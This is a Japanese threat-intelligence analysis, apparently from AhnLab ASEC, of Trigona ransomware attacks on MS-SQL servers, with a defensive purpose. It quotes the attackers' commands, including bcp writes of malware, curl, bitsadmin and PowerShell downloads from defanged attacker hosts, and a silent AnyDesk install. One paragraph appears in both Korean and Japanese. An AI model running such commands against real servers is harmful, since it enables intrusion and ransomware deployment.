Trigona 攻撃者の最新の攻撃事例の分析

AhnLab SEcurity intelligence Center(ASEC)は、過去の「Mimic ランサムウェアを使用する Trigona ランサムウェア攻撃者」[1] ポスティングを通じて Trigona 攻撃者の MS-SQL サーバーを対象とする攻撃事例を紹介した。当該の攻撃事例では Trigona ランサムウェアだけでなく、Mimic ランサムウェアが共に使用されたが、Mimic のランサムノートで使用した攻撃者のメールアドレスが他の攻撃事例では確認されていないのに対し、Trigona のランサムノートには2023年初めから Trigona ランサムウェアの攻撃者が使用していたメールアドレスが使われているため、Trigona 攻撃者と推定した。

ASEC は、同じ攻撃者が近年まで活動しており、過去の事例と同様の方式で攻撃を実行しているが、新しいタイプのマルウェアおよびツールが使用されていることから、最新の攻撃事例および IoC を公開する。

1. MS-SQL サーバーを対象とする攻撃

「MS-SQL サーバーを攻撃する Trigona ランサムウェア」[2] で公開したものと類似して、Trigona ランサムウェアの攻撃者は外部に公開されていながらアカウント情報を単純に設定しているため、総当たり攻撃や辞書攻撃に弱い MS-SQL サーバーを攻撃する。ログインに成功した後は CLR Shell を利用して追加ペイロードをインストールし、これは近年、事例でも同様に確認されている。以下は MS-SQL サーバーに対する操作権を取得した後、感染システムに関する情報を取得するために攻撃者が実行したコマンドである。

> hostname
> whoami
> systeminfo
> tasklist
> wmic useraccount where (LocalAccount=True) get name
> powershell -Command “net user ladmin”

2. マルウェアのインストール方式

Trigona 攻撃者の代表的な特徴の一つは、BCP(Bulk Copy Program)を利用してファイルを作成するという点である。BCP ユーティリティである bcp.exe は、MS-SQL サーバーで大量の外部データを取り込んだり、外部に出力したりするのに使われるコマンドラインツールである。一般的に SQL サーバーのテーブルに保存されている大量のデータをローカルのファイルに保存したり、ローカルに保存されているデータファイルを SQL サーバーのテーブルに出力したりするのに使われる。

攻撃者は、データベースにマルウェアを保存したあと、BCP を利用してローカルにファイルで作成する方式を使用する。すなわち、攻撃者はマルウェアが保存されているテーブル「uGnzBdZbsi」から以下のようなコマンドを利用してローカルパスにマルウェアを出力したが、「FODsOZKgAU.txt」はフォーマットファイルであり、フォーマット情報が含まれている。参考に、「uGnzBdZbsi」と「FODsOZKgAU.txt」はすべて2024年の攻撃事例でも使用されたキーワードである。

> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\spd.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\AD.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[사용자 이름]\music\L.bat” -T -f “C:\users\[ユーザー名]\music\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[사용자 이름]\music\pci2.exe” -T -f “C:\users\[ユーザー名]\music\FODsOZKgAU.txt”

図1. BCP を悪用したマルウェア作成

もちろん、BCP だけを悪用しているわけではなく、攻撃事例を見てみると Curl、Bitsadmin、PowerShell など、様々なツールを利用してマルウェアをダウンロードすることもあった。

> curl hxxps://cia[.]tf/60b30e194972f937b859d0075be69e2a.exe -o C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\glock.exe
> bitsadmin /transfer indirme  /download /priority normal hxxp://195.66.214[.]79/pci.exe c:\users\[ユーザー名]\Videos\pci.exe
> powershell Invoke-WebRequest -Uri “hxxp://195.66.214[.]79/L.bat” -OutFile “c:\users\[ユーザー名]\music\L.bat”

3. マルウェア分析

3.1. リモートコントロール

攻撃者は、以前の攻撃事例と同じく、感染システムを操作する目的で AnyDesk を悪用した。以下のようなコマンドを通じて %ALLUSERSPROFILE% パスに AnyDesk をインストールした。

> %SystemDrive%/programdata/AD.exe  –install C:\programdata –silent
> %SystemDrive%/programdata/Anydesk-e7eba7df  –get-id

その他にも RDP を利用することもあるが、以下のような Batch ファイルを実行して「Remote99」または「Ladmin」という名前の RDP 接続が可能なユーザーを追加した。この Batch マルウェアには、その他にも AnyDesk や UseLogonCredential レジストリキーを変更する機能がともに含まれていることが特徴である。

F図2. ユーザー追加機能を担う Batch ファイル

新たに確認されたマルウェアの中には、Downloader がある。Bat2Exe で製作されており、実質的な機能は以下のような Batch ファイルを作成して実行することである。この Batch スクリプトもまた、「erp2」という名前のアカウントを作成するが、外部で MSI ファイルをインストールするさらなる機能が存在するという点が違いである。現在のところ、ダウンロードは不可能だが、Teramind という名前の RMM ツールをインストールするものと推定され、攻撃者は RDP、AnyDesk の他にも Teramind を悪用して感染システムを操作したものと見られる。

図3. Teramind Downloader スクリプト

3.2. スキャナー(RDP、MS-SQL)

従来の事例との代表的な違い点としては、多数のスキャナーマルウェアが使用されているという点である。スキャナーマルウェアは Rust で作成されており、実行時に「ip-api.com」を通じて取得した IP および位置情報を含んだ感染システムの情報を C&C サーバーに送信する。その後、コマンドに応じてスキャニングを実行するが、その対象は以下のように RDP および MS-SQL サービスである。

図4. Rust スキャナー マルウェアの文字列

참고로 공격자는 이러한 스캐닝 및 브루트 포싱 악성코드를 설치하기 이전에 테스트를 먼저 수행하는 것으로 보인다. 공격자가 설치한 여러 도구들 중에는 Ookla에서 제공하는 인터넷 속도 측정 도구인 SpeedTest를 설치하거나 직접 제작한 것으로 추정되는 StressTester를 사용하기도 하였다. StressTester는 Go 언어로 제작되었으며 GET, POST 요청뿐만 아니라 SQL 인젝션 요청에 대해서도 테스트 기능을 제공한다.

参考に、攻撃者はこのようなスキャニングおよびブルートフォースのマルウェアをインストールする前にテストをまず実行するものと見られる。攻撃者がインストールした複数のツールの中には、Ookla が提供するインターネット速度測定ツールである SpeedTest をインストールや、自己製作したものと推定される StressTester を使用することもあった。StressTester は Go 言語で製作され、GET、POST リクエストだけでなく、SQL インジェクションリクエストに対しても、テスト機能を提供する。

図5. SQL インジェクションに関連する機能が含まれている StressTester

3.3. その他

この他にも Defender Control や、Github に公開されている権限昇格ツールがある。[3] そして、特定のパスのファイルを削除するマルウェア、特定のパスの実行ファイルをマルウェアに置き換える機能を実行するマルウェアなど、様々な種類のマルウェアおよびツールが攻撃に使用された。ファイル削除機能のマルウェアは Rust で開発されたタイプもあるが、以下のような Batch スクリプト形式も存在する。このマルウェアは、「C:\Users\Default\Drivers」、「C:\Drivers」など、マルウェアがインストールされるパスのディレクトリを削除する機能とともに、「C:\ProgramData」、「C:\Users\Public\Music」ディレクトリ内の「.exe」実行ファイルを削除する機能を担う。

図6. ディレクトリおよびファイル削除機能を担う Batch スクリプト

4. 結論

MS-SQL サーバーを対象とする攻撃には、代表的に不適切にアカウント情報を管理しているシステムに対する総当たり攻撃(Brute Forcing)と辞書攻撃(Dictionary Attack)がある。管理者は、アカウントのパスワードを推測が困難な形式に設定し、定期的にパスワードを変更することで、総当たり攻撃や辞書攻撃からデータベースサーバーを保護する必要がある。

また、V3 を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払わなければならない。さらに、外部に開放されていてアクセスが可能なデータベースサーバーに関してはファイアウォールのようなセキュリティ製品を利用し、外部の攻撃者からのアクセスを統制しなければならない。このような上記の処置が先行されていない場合、攻撃者やマルウェアによって感染が継続する場合がある。